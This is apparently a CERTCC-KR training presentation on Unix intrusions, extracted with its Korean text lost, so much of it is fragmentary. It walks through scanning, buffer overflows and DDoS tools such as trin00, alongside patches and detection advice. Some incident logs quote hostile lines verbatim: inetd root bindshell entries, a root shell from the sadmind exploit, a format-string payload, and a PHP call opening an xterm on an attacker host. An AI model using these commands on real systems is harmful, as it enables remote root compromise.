& Automated scan & attack / Internet Worm Ramen ADMWorm Millenium Internet Worm etc.
& multiple scan mscan, sscan, nmap,vetescan, sscanew,... Intruder Master Master Master / D D D D D D D D DDOS Trinoo, TFN, TFN2K, Stacheldraht, mstream,... Randomized ports Victim
(?) Windows Trojan BackOrifice, NetBus, Sub7, School Bus,DeepBO,...
Hackvisit
(Browers) Trojan(BO) GUI Trojan Horse E-mail (NNTP) DNS 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000
1/2 <1 >,, <2 > ftpd, amountd, imap guest, anonymous,, ID <3 >root root root <4 > (Sniffer) ID,
2/2 <5 > (Backdoor), /etc/inetd.conf root login Trojaned telnet *KAIST <6 >,,,, <7 > < >
Types of Scan mscan SAINT, sscan2k, vetescan, Cgican, winscan, rpcscan : nmap, stealthscan : firewalk, nmap
network cert# nmap -sp 203.233.150.*" Starting nmap V. 2.3BETA6 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Host (203.233.150.0) appears to be up. Host XXXXX.certcc.or.kr (203.233.150.xxx) appears to be up. Host XXXXX.certcc.or.kr (203.233.150.XXX) appears to be up. ( ) Host XXXXX.certcc.or.kr (203.233.150.xxx) appears to be up. Host (203.233.150.255) appears to be up. Host (141.233.150.255) seems to be a subnet broadcast address (returned 26 extra pings). Skipping host. Nmap run completed -- 256 IP addresses (27 hosts up) scanned in 14 seconds cert#
- nmap cert# nmap -I -O 203.233.150.XXX Starting nmap V. 2.3BETA6 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on XXX.certcc.or.kr (203.233.150.XXX): Port State Protocol Service Owner 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 80 open tcp http 110 open tcp pop-3 111 open tcp sunrpc 512 open tcp exec 1998 open tcp x25-svc-port 4045 open tcp lockd 6000 open tcp X11 6112 open tcp dtspc 7100 open tcp font-service TCP Sequence Prediction: Class=random positive increments Difficulty=28995 (Worthy challenge) Remote operating system guess: Solaris 2.6-2.7 Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds
- sscan2k [root@chief sscan2k-pre6]#./sscan -o 172.16.2.161 --------------------------<[ * report for host violet93 * <[ tcp port: 111 (unknown) ]> <[ tcp port: 6000 (unknown) ]> <[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]> <[ tcp port: 21 (ftp) ]> <[ tcp port: 113 (auth) ]> --<[ *OS*: violet93: NMAP detected: Linux 2.1.122-2.2.14 --<[ *Named* Running: 8.2.3-REL --<[ *BANNER*: Mail banner follows: 220 localhost.localdomain ESMTP Sendmail 8.11.0/8.11.0; Wed, 7 Feb 2001 17:05:55 +0900 --<[ * rpc services? * ]>-- <[ [prog. name -> portmapper] [port -> 111(udp)] [vers. -> 2] <[ [prog. name -> nlockmgr] [port -> 1056(udp)] [vers. -> 1] <[ [prog. name -> nlockmgr] [port -> 1056(udp)] [vers. -> 3] <[ [prog. name -> status] [port -> 1057(udp)] [vers. -> 1] <[ [prog. name -> status] [port -> 3196(tcp)] [vers. -> 1] --<[ * exports...? * ]>-- --<[ *VULN REPORT SUMMARY: violet93 --<[ *VULN*: violet93: sendmail will 'expn' accounts for us@? ---------------------------<[ * scan of violet93 completed
- vetescan [root@toyboy vetes]#./vetescan 172.16.2.161 [VetesCan]: checking for all the bitches arguments.. right on [VetesCan]: setting local script variables.. done. [VetesCan]: using nmap to detect running tcp services.. done. [VetesCan]: Lets see what OS the bitch has.. done. Done... [VetesCan]: checking for Vulnerable Services.. [VetesCan]: checking for Systat.. [VetesCan]: checking for Netstat.. [VetesCan]: checking for Authentication.. [VetesCan]: checking for ftpd.. [VetesCan]: checking for MDBMS.. [VetesCan]: checking for TCP/36864 portshell.. [VetesCan]: checking for gnapster.. [VetesCan]: checking for gdm.. [VetesCan]: checking for exec.. [VetesCan]: checking for D-Link Admin Login.. [VetesCan]: checking for Smb.. --- ---- =-=-=-=-=-=-=-=-=V=e=t=e=S=c=a=n=-=-=-=-=-=-=-=-=-=-= Running services on 172.16.2.161: Starting nmap V. 2.3BETA15 by fyodor@insecure.org ( www.insecure.org/nmap/ ) Interesting ports on violet93 (172.16.2.161): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 53 open tcp domain 111 open tcp sunrpc 113 open tcp auth 515 open tcp printer 6000 open tcp X11 TCP Sequence Prediction: Class=random positive increments Difficulty=4419211 (Good luck!) Remote operating system guess: Linux 2.1.122-2.2.14 Checking for Ftpd: [ver (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.] Vulnerable Ftpds: docs/ftp/vuln-ftp-versions.txt checking for RPC/Statd: statd Patch: ftp://sgigate.sgi.com/patches/ Exploit: docs/statd
[chief@chief]$ finger @203.233.150.xxx [203.233.150.1] Login Name TTY Idle When Where root Super-User console 3:20 Tue 10:30 :0 chief Ha do yoon pts/5 5:38 Wed 13:49 172.16.2.26 cert# rpcinfo -p 203.233.150.xxx program vers proto port 100000 2 tcp 111 rpcbind 100000 2 udp 111 rpcbind ( ) 100021 1 udp 1026 nlockmgr 100021 3 udp 1026 nlockmgr 100021 1 tcp 1024 nlockmgr 100021 3 tcp 1024 nlockmgr 300019 1 tcp 878 amd 300019 1 udp 879 amd
root local attack : easy remote attack : not easy rpc.statd ftpd amd sadmin named
Buffer Overflow copy stack return address root
0xbfffffb 0xbfffffb 0xbfffffb Botton of stack env.vars parameters Botton of stack env.vars parameters Botton of stack env.vars parameters stack grown buffer grown Return addr Prev.frame ptr Stack vars Stack frame 0 Return addr Prev.frame ptr Stack vars Expected location of the return addr Return addr Prev.frame ptr Stack vars frame pointer stack pointer. parameters Return addr Prev.frame ptr Buffer[96] Stack frame for main() frame pointer stack pointer. addr of the attack code Attack code Attack code Buffer overflow stack pointer Instruction pointer stack address space stack address space stack address space. addr of the attack code Attack code Attack code void void main() main() { { char char buffer[96]; Instruction buffer[96];.. pointer.. Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } Instruction pointer void void main() main() { { char char buffer[96]; buffer[96];.... Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } void void main() main() { { char char buffer[96]; buffer[96];.... Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } executed code segment executed code segment executed code segment (a) before the attack (b) after injecting the attack code (c) execting the attack code
Buffer Overflow SUID
rpc.statd bug 1. syslog() string input ---> root - rpc.statd UNIX 2. 3. - /etc/inetd.conf shell - 4. - NFS rpc.statd - CERTCC-KR KA2000-030
FTPD bug 1. "Site exec" Vulnerability - wu-ftpd 2.6.0 ftpd 2. setproctitle() Vulnerability - wu-ftpd 2.6.0, proftpd, OpenBSD (solaris ) Jul 4 17:43:25 victim ftpd[3408]: USER ftp Jul 4 17:43:25 victim ftpd[3408]: PASS [malicious shellcode] Jul 4 17:43:26 victim ftpd[3408]: ANONYMOUS FTP LOGIN FROM attacker.example.com [10.29.23.19], [malicious shellcode] Jul 4 17:43:28 victim-site ftpd[3408]: SITE EXEC (lines: 0): %.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f %p Jul 4 17:43:28 victim ftpd[3408]: FTP session closed 3. http://www.redhat.com/support/errata/rhsa-2000-039-02.html
Linux amd Buffer Overflow amd - - am-utils amd - RedHat 6.x - - RedHat 6.x - amd
Linux amd Buffer Overflow [/tmp]# grep amd /var/log/messages messages.1:mar 11 05:20:50 xxx 27>Mar 11 05:20:50 amd[468]: amq requested mount of ^N 3 F^L ^W ^Z?K? 18 Jan 1998--str/bin/sh(-c)/bin/echo '2222? stream tcp nowait root /bin/sh s (^ [/tmp]# ls -l -rw-rw-rw- 1 root root 116 Mar 11 05:20 h [/tmp]# more h 2222 stream tcp nowait root /bin/sh sh -i
Linux amd Buffer Overflow [/tmp]# ps aux grep inetd root 337 0.0 1.6 1236 512? S Jan12 0:00 inetd root 3068 0.0 1.6 1236 512? S Mar11 0:00 inetd -s /tmp/h [root@alzza6 ~]# netstat -a grep 2222 tcp 0 0 *:2222 *:* LISTEN
Linux amd Buffer Overflow $ telnet xxx.xxx.xxx.xxx 2222 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. bash# id id uid=0(root) gid=0(root) groups=0(root) bash#
Linux amd Buffer Overflow - 1- Intel: ftp://updates.redhat.com/6.0/i386/am-utils-6.0.1s11-1.6.0.i386.rpm Alpha: ftp://updates.redhat.com/6.0/alpha/am-utils-6.0.1s11-1.6.0.alpha.rpm SPARC: ftp://updates.redhat.com/6.0/sparc/am-utils-6.0.1s11-1.6.0.sparc.rpm Source: ftp://updates.redhat.com/6.0/srpms/am-utils-6.0.1s11-1.6.0.src.rpm Architecture neutral: ftp://updates.redhat.com/6.0/noarch/ # rpm -Uvh " # /etc/rc.d/init.d/amd restart
Linux amd Buffer Overflow - 2- amd # ps ax grep amd 444? S 0:00 /usr/sbin/amd -a /.automount -l syslog -c 1000 /net # killall -9 amd
Linux amd Buffer Overflow - 2- amd run level # chkconfig --list amd amd 0:off 1:off 2:off 3:on 4:on 5:on 6:off # chkconfig --level 0123456 amd off # chkconfig --list amd amd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
sadmind Buffer Overflow Sadmind - Solaris 2.3 2.4 :Sun Solstice Adminsuite - Solaris 2.5, 2.6, 2.7 /usr/sbin - remote - request, inetd daemon
sadmind Buffer Overflow Sadmind - sadmind stack - sadmind root - remote root - offset ~
sadmind Buffer Overflow cert# sadmindex -h 172.16.2.17 -s [offset] %sp 0xefff9580 offset 688 --> return address 0xefff9838 [4] %sp 0xefff9580 with frame length 4808 --> %fp 0xefffa850 clnt_call: RPC: Timed out now check if exploit worked; RPC failure was expected cert# telnet 172.16.2.17 1524 Trying 172.16.2.17... Connected to 172.16.2.17. Escape character is '^]'. # id; uid=0(root) gid=0(root)
sadmind Buffer Overflow (172.16.2.17) # ls -al /tmp/bob -rw-rw-rw- 1 root root 48 Jun 7 15:34 /tmp/bob # cat /tmp/bob ingreslock stream tcp nowait root /bin/sh sh -i # ps -ef. root 1059 1 0 15:19:07? 0:00 /usr/sbin/inetd -s /tmp/bob. # netstat -a Local Address Remote Address Swind Send-Q Rwind Recv-Q State -------------------- -------------------- ----- ------ ----- ------ ------- *.ingreslock *.* 0 0 0 0 LISTEN
sadmind Buffer Overflow /var/adm/messages Apr 12 06:43:34 xxxx inetd[138]: /usr/sbin/sadmind: Bus Error - core dumped Apr 12 06:43:36 xxxx inetd[138]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 12 06:43:39 xxxx inetd[138]: /usr/sbin/sadmind: Bus Error - core dumped Apr 12 06:43:41 xxxx inetd[138]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 12 06:43:44 xxxx inetd[138]: /usr/sbin/sadmind: Hangup
sadmind Buffer Overflow /etc/inetd.conf, ( # ). 100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind sadmind ( : /opt/sunwadm/bin/admuseradd ) 100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2
sadmind Buffer Overflow - OS Version Patch ID SunOS 5.7 108662-01 SunOS 5.7_x86 108663-01 SunOS 5.6 108660-01 SunOS 5.6_x86 108661-01 SunOS 5.5.1 108658-01 SunOS 5.5.1_x86 108659-01 SunOS 5.5 108656-01 SunOS 5.5_x86 108657-01 AdminSuite Version Patch ID 2.3 104468-18 (see Note) 2.3_x86 104469-18 (see Note)
DNS : named, : resolver TCP, UDP port 53 port - DNS
DNS - - Inverse Query - inverse query request - root - BIND 8(/etc/named.conf ) fake-iquery no; - BIND 4.9(/etc/named.boot ) options fake-iquery, conf/options.h INVQ
DNS - - Inverse Query /var/named/admrocks empty /etc/inetd.conf 2222 port back door 2222 stream tcp nowait root /bin/sh sh -i
NXT NXT Regular Record DNS - - owner name zone name zone signed
NXT DNS - - - BIND 8.2, 8.2 p1, 8.2.1 NXT validate - NXT - buffer overflow code - named - BIND 8.2 - BIND 4.x
NXT DNS - - ADM named 8.2/8.2.1 NXT remote overflow exploit 1999 exploit root /tmp/bob ingreslock stream tcp nowait root /bin/sh sh -i /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob /var/named/admrocks empty directory / var/named/o
DNS DNS off /etc/rc.d/init.d/named stop chmod -x /etc/rc.d/init.d/named bind - bind 4.9.7, 8.2.2 p5 - : http://www.isc.org/new-bind.html Solaris 7 Solaris 7 (SPARC) 107018-02 106938-03 Solaris 7 (Intel) 107019-02 106939-03 http://sunsolve.sun.com/securitypatch RedHat Linux 6.x ( ) http://www.redhat.com/support/errata/rhsa1990054-01.6.0.html
Back door / backdoor 1. bindshell - daemon shell 2. inetd - trojan remote access 3. tcpd - hide connection, avoid deny 4. Rshd - trojan remote access 5. chfn, chsh - user root 6. crontab - cron 7. du - hide file size 8. find - hide file 9. ls - hide file 10. ifconfig - hide sniffing (hide promiscuous mode interface)
Back door / backdoor 11. killall - kill 12. sniffer - packet sniffer 13. sniffchk - sniffer 14. login - trojan remote access 15. netstat - hide connection, hide listening port 16. passwd - user root 17. pidof - hide process (linux) 18. ps - sniffer, backdoor daemon 19. wted - wtmp / utmp 20. syslogd - hide log 21. top - sniffer, backdoor daemon
Back door bindshell # @(#)inetd.conf 1.1 87/08/12 3.2/4.3NFSSRC # Internet server configuration database ftp stream tcp nowait root /usr/etc/ftpd ftpd telnet stream tcp nowait root /usr/etc/telnetd telnetd shell stream tcp nowait root /usr/etc/rshd rshd 2222 stream tcp nowait root /bin/sh sh -i
shell backdoor scan 1. - 2. 3 scanning 3. tcp 1524, 2222, 9704 scan scanner#./synscan infile outfile eth0 50 1524,2222,9704 SynScan 1.6 by psychoid/tcl scanner# cat outfile 203.***.190.250 (203.***.190.250):1524 :# 202.***.78.98 (202.***.78.98):1524 :bash# 202.***.13.81 (202.***.13.81):2222 :bash# cf. 2000 7 PC outfile.
Rootkit,, backdoor Rootkit /dev. (ls ls ). (ex. /usr/src/linux/arch/alpha/lib) find /dev -type f -print
Rootkit rootkit lrk 4,5 warchild rootkit (solaris, linux),knork Rootkit. (ex. ac.kr scanning) scanning Denial of service..
Sniffing ID telnet, pop, www ID esniff, solsniff, linsniff, sniffit, tcpdump, snoop, WWW Sniff
Sniffing promiscuous mode : sniffing. :CPM, neped Secure Shell (SSH), VPN tcp session.
Event Attack Incident : Hackers, Spies, Terrorists, Corporate raider, Professional Criminals, Vandals, Voyeurs : Physical Attack, Information Exchange, User command, Script/Program, Autonomous agent, Toolkit, Distributed tool, Data trap : Design, Implementation, Configuration : Probe, Scan, Flood, Authenticate, Bypass, Spoof, Read, Copy, Steal, Modify, Delete : Account, Process, Data, Component, Computer, Network, Internet work : Increased Access, Disclosure of Information, Corruption of Information, Denial of Service, Theft of Resources : Challenge Status/Thrill, Political Gain, Financial Gain, Damage
(Denial Of Service) TCP DOS DOS
Distributed DOS Attack Trin00 Attack 27665/tcp Intruder M-> D : 27444/udp D->M : 31335/udp Master Master Master D D D D D D D D Randomized ports Victim
Trin00 Attack Communication Network Master Daemon Agent Daemon Hello telnet xxx.xxx.xxx. xxx 27665 password trinoo > Trinoo > attack IP- Addr password attack IP- addr Broadcast PONG Attack (UDP Flooding)
Stacheldraht Attack Communication Network 65000/tcp or ICMP ECHO_REPLY ICMP ECHO_REPLY agent 16660/tcp ( ) master TCP SYN, UDP flood ICMP flood, Smurf Internet Attacker master handler client
Distributed DOS Attack Trin00 ( ) : Trin00 rpc./trin.sh nc xxx.xxx.xxx.xxx 1524 WORM trin00
Distributed DOS Attack Trin00 trin00 master Deamon # nmap -PI -st -p 27665 -m 2766.log xxx.xxx.xxx.1-254 # nmap -PI -su -p 31335 -m 31335.log xxx.xxx.xxx.1-254 # nmap -PI -su -p 27444 -m 27444.log xxx.xxx.xxx.1-254 rpc # nmap -PI -st -p 1524 -m 1524.log xxx.xxx.xxx.1-254 ) Host: xxx.xxx.xxx.21 () Status: Up Host: xxx.xxx.xxx.22 () Ports: 31335/open/udp///// Host: xxx.xxx.xxx.28 () Ports: 31335/open/udp///// Host: xxx.xxx.xxx.29 () Ports: 31335/open/udp/////
Distributed DOS Attack Trin00 : trin00 : tserver1900, deamon : tsolnmb, ns, httpd, rpc.trinoo, rpc.listen, trinix, rpc.irix, irix cron table * * * * /dev/isdn/.subsys/tsolnmb > /dev/null 2>&1 netstat *:31335 Idle (UDP) *:27444 Idle (UDP) *:27665 *:*... Listen (TCP)
Distributed DOS Attack Trin00 Secure Your Host 31335(UDP), 27444(UDP), 27665(TCP) DOS Trin00 http://www.fbi.gov/nipc/trinoo.htm National Infrastructure Protection Center http://www.washington.edu/people/dad/ http://www.clark.net/~roesch/security.html Trin00 CERTCC-KR, cert@certcc.or.kr
Distributed DOS Attack Trin00 daemon strings master master CERTCC-KR daemon binary master master daemon IP CERTCC-KR CERTCC-KR daemon host trin00 CERTCC-KR
Distributed DOS Attack Trin00 CERTCC-KR Trin00 ISP Trin00? Trin00 /
PHP 1. / 2. 3. php <? system( "/usr/bin/x11/xterm -display < IP>:0.0" );?> 4. PHP CGI.php.php3.cgi SSI( Server Side Interpreter ) --> nobody
PHP 5. - PHP, - -,.php.php3 cgi - CERTCC-KR KA2000-031
- -
- -
- -
- - /usr/sbin/pwconv, pwunconv crack passwd+, npasswd, anlpasswd -n : -x : -w : /etc/default/passwd PASSLENGTH
- - Linux Red Hat : http://www.redhat.com/errata SUNOS : http://sunsolve.sun.com/pub-cgi/ show.pl?target=patches/patch-access HPUX : http://us-support2.external.hp.com/ IBM AIX : ftp://aix.software.ibm.com/aix/efixes/security/ NOVELL : ftp://ftp.novell.com SCO : ftp://ftp.sco.com SGI : ftp://ftp.sgi.com/security/sgi
- - UNIX Utmp Acces s_log mess ages News log Su log Secur e log wtmp SPAM relay Popd O O Spool er log Sys log Imapd O O Named O Innd O O Identd O Phf CGI O Portscan Mscan O O O su O O login O O O O ftp O O O O O
Q & A